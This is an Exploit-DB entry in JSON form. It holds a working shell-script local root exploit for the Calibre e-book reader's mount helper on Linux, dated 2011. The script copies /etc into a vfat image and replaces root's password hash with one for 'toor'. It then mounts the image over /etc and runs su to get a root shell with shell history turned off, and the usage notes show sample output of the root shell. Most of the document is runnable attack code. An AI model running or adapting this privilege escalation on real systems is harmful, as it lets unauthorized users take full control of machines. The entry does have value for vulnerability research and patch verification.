Calibre E-Book Reader Local Root Exploit

{"bulletinFamily": "exploit", "id": "EDB-ID:18071", "cvelist": [], "modified": "2011-11-03T00:00:00", "lastseen": "2016-02-02T09:07:28", "edition": 1, "sourceData": "# Exploit Title: .60-Calibrer Assault Mount: Another Calibre E-Book Reader Local Root\r\n# Date: Nov 2, 2011\r\n# Author: zx2c4\r\n# Software Link: http://calibre-ebook.com/\r\n# Tested on: Gentoo\r\n# Platform: Linux\r\n# Category: Local\r\n# CVE: pending\r\n#!/bin/sh\r\n\r\n #######################################\r\n # .60-Calibrer Assault Mount #\r\n # by zx2c4 #\r\n #######################################\r\n\r\n################################################################################\r\n# Yesterday we learned how Calibre's usage of execlp allowed us to override PATH\r\n# and get root, in my \".50-Calibrer Assault Mount\" exploit. Today we exploit a\r\n# more fundumental issue with Calibre's mount helper -- namely, that it allows\r\n# us to mount a vfat filesystem anywhere we want. By mounting a file system\r\n# image over /etc, we are able to tinker /etc/passwd and make the root password\r\n# temporarily \"toor\".\r\n#\r\n# - zx2c4\r\n# 2011-11-2\r\n#\r\n# Usage:\r\n# $ ./60calibrerassaultmount.sh \r\n# [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4\r\n# [+] Making overlay image:\r\n# 51200+0 records in\r\n# 51200+0 records out\r\n# 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s\r\n# mkfs.vfat 3.0.11 (24 Dec 2010)\r\n# [+] Mounting overlay image using calibre-mount-helper.\r\n# [+] Copying /etc into overlay.\r\n# [+] Tampering with overlay's passwd.\r\n# [+] Unmounting overlay image using calibre-mount-helper.\r\n# [+] Mounting overlay to /etc using calibre-mount-helper.\r\n# [+] Asking for root. When prompted for a password, enter 'toor'.\r\n# Password: [typed in toor to the terminal] \r\n# [+] Unmounting /etc using root umount.\r\n# [+] Cleaning up: /tmp/tmp.OGgS0jaoD4\r\n# [+] Getting shell.\r\n# sh-4.2# id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n# sh-4.2# whoami\r\n# root\r\n# sh-4.2# \r\n################################################################################\r\n\r\n\r\necho \"#######################################\"\r\necho \"# .60-Calibrer Assault Mount #\"\r\necho \"# by zx2c4 #\"\r\necho \"#######################################\"\r\necho\r\necho -n \"[+] Making temporary directory: \"\r\ndir=\"$(mktemp -d)\"\r\necho \"$dir\"\r\ncd \"$dir\"\r\necho \"[+] Making overlay image:\"\r\ndd if=/dev/zero of=overlay count=51200\r\n/usr/sbin/mkfs.vfat overlay\r\necho \"[+] Mounting overlay image using calibre-mount-helper.\"\r\nmkdir staging\r\ncalibre-mount-helper mount overlay staging\r\necho \"[+] Copying /etc into overlay.\"\r\ncd staging/\r\ncp -a /etc/* . 2>/dev/null\r\necho \"[+] Tampering with overlay's passwd.\"\r\ncat passwd | tail -n +2 > tmp\r\necho \"root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash\" >> tmp\r\nmv tmp passwd\r\necho \"[+] Unmounting overlay image using calibre-mount-helper.\"\r\ncd ..\r\ncalibre-mount-helper eject overlay staging >/dev/null 2>&1\r\necho \"[+] Mounting overlay to /etc using calibre-mount-helper.\"\r\ncalibre-mount-helper mount overlay /etc >/dev/null 2>&1\r\ncd /\r\necho \"[+] Asking for root. When prompted for a password, enter 'toor'.\"\r\nsu -c \"echo \\\"[+] Unmounting /etc using root umount.\\\"; umount /etc; echo \\\"[+] Cleaning up: $dir\\\"; rm -rf \\\"$dir\\\"; echo \\\"[+] Getting shell.\\\"; HISTFILE=\\\"/dev/null\\\" exec /bin/sh\"", "published": "2011-11-03T00:00:00", "href": "https://www.exploit-db.com/exploits/18071/", "osvdbidlist": ["76827"], "reporter": "zx2c4", "hash": "0a0bd199edc29420c55b9be25c34f0f66961addc5033fe872216aa2cad159f1e", "title": "Calibre E-Book Reader Local Root Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Calibre E-Book Reader Local Root Exploit. Local exploit for linux platform", "references": [], "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/18071/"}